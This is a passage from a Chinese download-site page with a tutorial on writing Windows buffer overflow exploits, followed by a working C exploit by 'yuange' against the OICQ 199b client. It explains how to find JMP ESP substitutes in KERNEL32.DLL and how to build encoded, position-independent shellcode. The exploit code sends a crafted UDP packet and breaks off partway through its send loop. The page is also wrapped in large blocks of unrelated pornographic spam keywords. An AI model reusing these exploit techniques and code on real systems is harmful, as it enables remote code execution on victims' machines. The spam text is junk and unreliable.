亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? windows下的溢出程序編寫技巧.txt

?? 可以對黑客編程有一定的了解
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
WINDOWS下的溢出程序編寫技巧


  看了些WINDOWS下的溢出程序,覺得不夠統一、完美,決定做一個相對較統一的編寫方法,試著解決了些問題。

1、JMP ESP 的問題。
      為了盡量統一,都使用KERNERL32。DLL的代碼,因為至少同一系統KERNEL32。DLL模塊裝載地址變化可能小,別的模塊可能隨著安裝應用軟件的環境不同裝載地址不同,還有其模塊安裝是KERNEL32。DLL在比較前面,后面的模塊安裝地址要隨前面模塊的變動而變動,所以還是決定用KERNEL32。DLL相對比較統一(就是同一系統不同版本)。解決了JMP ESP (FF E4)代碼找不到問題,增加使用
      PUSH ESP  (54)
      。。。。
      RET       (C3)
      或者
      PUSH ESP  (54)           
      。。。。
      RET 00XX  (C2 XX 00) (RET NUM ,NUM最好不要太大,所以做限制 NUM=00XX)
      代碼,這可以找到很多了。“。。?!睘閹讞l不定語句,但要不影響功能的。
      比如找到一處代碼就可以使用:
         PUSH ESP
         AND  AL,08
         RET  10
     選擇原則盡量使用模塊前面的可用的,因為不同版本前面的相同可能要大。
     因為9X與NT系統模塊裝載地址有很大區別,所以用這方法不可能統一,我看了WINNT、WIN2000竟然KERNEL32。DLL的裝載地址也不一樣,真有點。。。。具體哪個程序的溢出可以試著找那程序中的 JMP ESP,但這地址一般都是0X00XXXXXX,所以也有問題。 這是否可以在程序中先識別要攻擊系統的系統?下面程序是用宏定義。

2、解決SHELLCODE的編寫問題。
    原來很多程序的SHELLCODE都是用先編寫好后用"\XAA\XBB"的形式寫出來,一個是不好修改,還有不好看到底是什么SHELLCODE。所以想法是SHELLCODE和溢出程序一起編寫。這對SHELLCODE編寫稍微有點要求,這就是要求SHELLCODE代碼是可移動代碼,就是整個代碼地址移動照常運行。為了減少不兼容,函數調用地址也用LOADLIBRARY和GETPROCADDRESS得到,這樣SHELLCODE就只依靠這兩個參數。其實這兩個參數也可以在內存里面找到KERNEL32。DLL模塊,再根據函數引出表自己得到地址。那樣就只有JMP ESP地址在WINNT、WIN200、WIN9X下沒有統一了。
    程序中已經大致有了SHELLCODE編寫的雛形?,F在有幾個問題:
     一,確定SHELLCODE函數代碼地址,直接指定得到的是一個JMP SHELLCODE的地址,應該有方法直接得到的。
     二,SHELLCODE用C編寫編譯后往往有_CHKESP的一個調用,這可以改匯編編寫或者找到里面的call _CHKESP的代碼用NOP填充。

3、SHELLCODE字符往往有要求,決定對SHELLCODE編碼,前面加一小段代碼對SHELLCODE解碼,編碼為符合要求的SHELLCODE,這減輕對SHELLCODE編寫的要求。不同要求主要改寫這一小段編碼代碼。
   

/*   oicq 199b build 0220   overflow program 
     copy by yuange <yuange@163.net>  2000。04。18
     新版本0410有堆溢出,用這程序可以攻擊,但不能執行SELLCODE
*/   

#include <windows.h> 
#include <winsock.h>
#include <stdio.h>
#define  NUKEWIN2000
//#define  NUKEWIN9X
#ifdef     NUKEWIN2000
#define  RETEIPADDR    eipwin2000
#define  LoadLibraryfnaddress    0x77e78023  //0x77E60000+0x00018023  LoadLibrary
#define  GetProcAddressfnaddress 0x77e7564b  //0X77E60000+0x0001564B  GetProcAddress
#else
   #ifdef   NUKEWIN9X
   #define  RETEIPADDR    eipwin9x
   #define  LoadLibraryfnaddress    0xbff77750  //0xbff70000+0x00007750  LoadLibrary
   #define  GetProcAddressfnaddress 0xbff76e28  //0xbff70000+0x00006e28  GetProcAddress
   #else
   #define  RETEIPADDR    eipwinnt
   #define  LoadLibraryfnaddress    0x77EE391A  //0x77ED0000+0x0001391A  LoadLibrary
   #define  GetProcAddressfnaddress 0x77eE4111  //0x77ED0000+0x00014111  GetProcAddress
   #endif
#endif
#define  NOPCODE    0x90
#define  BUFFSIZE   0x2000
#define  OICQPORT   4000
#define  OICQOVERADD 7+0x41C
#define  OVERADD    OICQOVERADD
#define  STR0 0
#define  STR1 11
#define  STR2 23
#define  STR3 33
#define  STR4 39
#define  STR5 51

void     shellcodefnlock();
void     shellcodefn();
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

int main(int argc, char **argv)
{ 
  char *server;
  char *str="user32.dll""\x0""MessageBoxA""\x0""  secuess""\x0""  OK!""\x0""msvcrtd.dll""\x0""exit""\x0";
  char buff1[]="\x02\x01\x07\x00\x78\x11\x22\x33\x33\x33\x33\x33\x1f\x30\x1f\x37\x35\x1f""2000-4-10""\x1f""12:00:00""\x1f";
  /* oicq udp head */

  //0x77ed0000+0x1ddd4   kernel32.dll   //  push esp   //  and al,08   //  ret 0c
  char  eipwinnt[]    ="\xd4\xdd\xee\x77";     //0x77ed0000+0x0001ddd4

  char  eipwin2000[]  ="\xea\x17\xe8\x77";     //0x77e60000+0x000217ea
  //  kernel32.dll     //  push esp          //  and al,08          //  ret 0c

  //0x77e2e32a user32.dll JMP ESP 
  char  eip2win2000[] = "\x2a\xe3\xe2\x77";  //0x77df0000+0x0003e32a
  char  eipwin9x[]    = "\xd9\x6a\xf7\xbf";  //0xbff70000+0x00006ad9 
  //  Kernel32.dll     4.10.2184                0xbff70000+0x0006ad9
  // push esp      // and al,0x10;    // ret 0x10;
  
  char    buff[BUFFSIZE];
  char    shellcodebuff[0x1000];
  struct  sockaddr_in s_in2,s_in3;
  struct  hostent *he;
  char    *shellcodefnadd,*chkespadd;
  unsigned  int sendpacketlong;
  unsigned  int i,j,k;
  unsigned  char temp;
  int     fd;
  u_short port,port1;
  SOCKET  d_ip;
  WSADATA wsaData;
  
  int result= WSAStartup(MAKEWORD(1, 1), &wsaData);
  if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
            "to the Internet at the time that "
            "this program was launched, or you "
            "do not have a 32-bit "
            "connection to the Internet.");
        exit(1);
    }

  if(argc <2)
  {
       WSACleanup( );    
       fprintf(stderr,"\n nuke oicq .\n copy by yuange 2000.4.1. \n wellcome to my homepage http://yuange.yeah.net .");
       fprintf(stderr, "\n usage: %s <server> [port] \n", argv[0]);
       exit(1);
  }
  else  server = argv[1];

  d_ip = inet_addr(server);
  if(d_ip==-1){
     he = gethostbyname(server);
     if(!he)
     {
       WSACleanup( );
       printf("\n Can't get the ip of %s !\n",server);
       exit(1);     
     }
     else    memcpy(&d_ip, he->h_addr, 4);
  }     
  if(argc>2) port = atoi(argv[2]);
  else port=OICQPORT;
  if(port==0) port=OICQPORT;

  fd = socket(AF_INET, SOCK_DGRAM,0);
  i=8000;
  setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
  s_in2.sin_family = AF_INET;
  if(argc>3) port1=atoi(argv[3]);
  else port1=OICQPORT;
  if(port1==0) port1=OICQPORT;
  s_in2.sin_port = htons(port1);
  s_in2.sin_addr.s_addr =0;
         
  s_in3.sin_family = AF_INET;
  s_in3.sin_port = htons(port);
  s_in3.sin_addr.s_addr = d_ip;
  bind(fd,(const struct sockaddr FAR* )&s_in2, sizeof(struct sockaddr_in));
  printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));

  memset(buff,NOPCODE,BUFFSIZE);
  memcpy(buff,buff1,37);

  _asm{
         mov ESI,ESP
         cmp ESI,ESP
  }
  _chkesp();
  chkespadd=_chkesp;
  temp=*chkespadd;
  if(temp==0xe9) {
         ++chkespadd;
//         (int *) i=(int*) *chkespadd;
         _asm{
             mov EDI,dword ptr [chkespadd]
             mov EDI,[EDI]
             mov i,EDI
         }
         chkespadd+=i;
         chkespadd+=4;
  }

  shellcodefnadd=shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
//         (int *) k=(int *) *shellcodefnadd;
         _asm{
             mov EDI,dword ptr [shellcodefnadd]
             mov EDI,[EDI]
             mov k,EDI
         }
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }

  for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,"\x90\x90\x90\x90",4)==0) break;
  }
  memcpy(buff+OVERADD+0x20,shellcodefnadd+k+4,80);
     
  shellcodefnadd=shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
          ++shellcodefnadd;
//         (int *)k=*shellcodefnadd;
          _asm{
             mov EDI,dword ptr [shellcodefnadd]
             mov EDI,[EDI]
             mov k,EDI
         }
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }
  
  for(k=0;k<=0x1000;++k){
         if(memcmp(shellcodefnadd+k,"\x90\x90\x90\x90",4)==0) break;
  }

  memcpy(shellcodebuff,shellcodefnadd,k);   //j);
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);     

  
  memcpy(shellcodebuff+k,str,0x80);
  sendpacketlong=k+0x80;
  for(k=0;k<=0x200;++k){
         if(memcmp(buff+OVERADD+0x20+k,"\x90\x90\x90\x90",4)==0) break;
  }

  for(i=0;i<sendpacketlong;++i){
         temp=shellcodebuff[i];
         temp&=0xf0;
         temp=temp/0x10;
         temp+=0x41;
         buff[OVERADD+0x20+k]=temp;
         ++k;
         temp=shellcodebuff[i];
         temp&=0x0f;
         temp+=0x41;
         buff[OVERADD+0x20+k]=temp;
         ++k;
  }
  memcpy(buff+OVERADD,RETEIPADDR,4);
  sendpacketlong=OVERADD+0x20+k+0x10;
  for(i=0;i<1;++i){ 
     j=rand();

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲国产另类精品专区| 久久精品欧美日韩精品| 国内精品国产成人| 欧美韩国日本不卡| 日韩欧美一区二区视频| 丁香婷婷综合激情五月色| 日韩毛片高清在线播放| 91视频在线观看免费| 日韩二区三区在线观看| 国产精品国产三级国产普通话99| 精品视频1区2区3区| 成人免费高清在线| 日韩二区三区四区| 国产精品女同一区二区三区| 97se亚洲国产综合自在线| 麻豆国产欧美日韩综合精品二区| 亚洲乱码国产乱码精品精小说 | 国产亚洲一区二区三区四区 | 欧美视频一区在线| 国产成人综合亚洲网站| 五月天激情小说综合| 中文字幕av一区二区三区免费看| 欧美v国产在线一区二区三区| 色88888久久久久久影院野外| 亚洲一区二区三区中文字幕 | 日本大香伊一区二区三区| 蜜桃av一区二区三区| 久久精品一区二区三区av| 亚洲黄色录像片| 在线这里只有精品| 奇米精品一区二区三区在线观看| 久久av中文字幕片| 国产网站一区二区三区| 99精品国产91久久久久久| 亚洲欧美成aⅴ人在线观看| 欧美大尺度电影在线| 国产一区二区三区高清播放| 欧美v日韩v国产v| 99久久er热在这里只有精品66| 伊人开心综合网| 欧美亚洲一区二区在线| 懂色av一区二区三区免费观看| 亚洲精品中文在线影院| 欧美一区二区三区四区久久| 久久爱www久久做| 亚洲女爱视频在线| 精品久久久久久久人人人人传媒 | 欧美色图激情小说| 亚洲成av人**亚洲成av**| 久久久久久久网| 精品视频资源站| 国产精品123区| 日韩欧美中文字幕制服| 欧洲视频一区二区| 国产高清久久久久| 日韩av一二三| 亚洲愉拍自拍另类高清精品| 欧美精品一区二区久久婷婷| 色婷婷综合久色| 国产精品一级在线| 激情成人综合网| 亚洲va国产天堂va久久en| 国产精品久久福利| 日韩国产精品久久| 午夜av一区二区三区| 国产精品丝袜久久久久久app| 欧美一级片在线看| 欧美一区二区三区人| 欧美综合在线视频| 大美女一区二区三区| 日本va欧美va精品发布| 亚洲男同性恋视频| 国产精品二三区| 国产亚洲综合色| 亚洲国产精品激情在线观看| 2024国产精品| 日韩午夜激情视频| 91丨九色丨蝌蚪富婆spa| 波多野结衣中文字幕一区二区三区| 麻豆成人在线观看| 日韩成人精品在线观看| 日韩精品一二三| 亚洲va国产天堂va久久en| 亚洲最快最全在线视频| 综合分类小说区另类春色亚洲小说欧美| 欧美激情中文字幕| 久久久三级国产网站| 精品国产乱码久久久久久蜜臀| 日本道免费精品一区二区三区| av亚洲精华国产精华精| 岛国精品在线播放| a在线欧美一区| 欧美系列在线观看| 欧美午夜电影网| 欧美日韩国产一级片| 欧美色国产精品| 欧美天堂亚洲电影院在线播放| av中文字幕不卡| 91原创在线视频| 欧美人与禽zozo性伦| 欧美久久婷婷综合色| 欧美一级片在线| 欧美精品久久一区二区三区 | 日韩欧美成人激情| 久久亚洲精品小早川怜子| 26uuu亚洲| 国产婷婷色一区二区三区| 国产精品三级av| 亚洲青青青在线视频| 午夜精品久久久久久久| 美女视频网站久久| 国产91色综合久久免费分享| 国产乱码精品一品二品| 在线观看91精品国产入口| 69精品人人人人| 久久综合久色欧美综合狠狠| 国产免费久久精品| 一区二区成人在线观看| 麻豆精品视频在线观看视频| 福利一区在线观看| 欧美日韩精品综合在线| 日韩美一区二区三区| 精品成人一区二区三区四区| 亚洲激情在线激情| 免费看精品久久片| 波多野结衣中文字幕一区| 欧美一级淫片007| 中文字幕中文字幕中文字幕亚洲无线| 一区二区三区在线观看国产| 亚洲午夜av在线| 成人影视亚洲图片在线| 欧美日韩在线播| 亚洲最大成人网4388xx| 亚洲一级二级三级在线免费观看| 久久99精品久久久| 一本大道综合伊人精品热热| 欧美美女一区二区三区| 国产欧美一二三区| 亚洲国产aⅴ天堂久久| 欧美狂野另类xxxxoooo| 久久精品免费在线观看| 日日夜夜精品视频天天综合网| 成人激情小说乱人伦| 精品久久国产字幕高潮| 午夜av一区二区| 欧美亚洲综合另类| 亚洲欧美日韩中文播放| jlzzjlzz欧美大全| 久久久国产精品不卡| 精品亚洲成a人| 日韩欧美一级在线播放| 亚洲成人免费视| 在线免费亚洲电影| 亚洲人精品一区| 成人精品gif动图一区| 国产亚洲女人久久久久毛片| 看电视剧不卡顿的网站| 日韩欧美久久久| 日本 国产 欧美色综合| 91精品国产91久久久久久最新毛片| 一区二区高清在线| 色94色欧美sute亚洲线路一久| 自拍偷自拍亚洲精品播放| 99视频在线观看一区三区| 国产精品你懂的在线欣赏| 粉嫩一区二区三区在线看 | 337p亚洲精品色噜噜| 亚洲国产成人精品视频| 欧美日韩一区二区三区视频| 亚洲无线码一区二区三区| 欧美日韩国产123区| 首页国产丝袜综合| 欧美二区在线观看| 日本午夜精品视频在线观看| 欧美日韩国产色站一区二区三区| 亚洲国产美女搞黄色| 91麻豆精品国产91久久久使用方法| 99这里只有精品| 久久久久9999亚洲精品| 国产大陆a不卡| 国产精品对白交换视频| 色婷婷av一区二区三区gif| 亚洲精品成人天堂一二三| 欧美日韩精品一区视频| 免费在线看成人av| 中文字幕一区二区三区不卡| 国产毛片精品视频| 中文字幕欧美日本乱码一线二线| gogo大胆日本视频一区| 亚洲资源中文字幕| 日韩一区二区三区av| 国产精品一区二区在线观看网站 | 欧美一区二区三区四区在线观看| 日本网站在线观看一区二区三区| 欧美成人精品3d动漫h| 成人av网站在线| 亚洲综合另类小说| 久久久电影一区二区三区| 色视频一区二区| 精品亚洲成a人|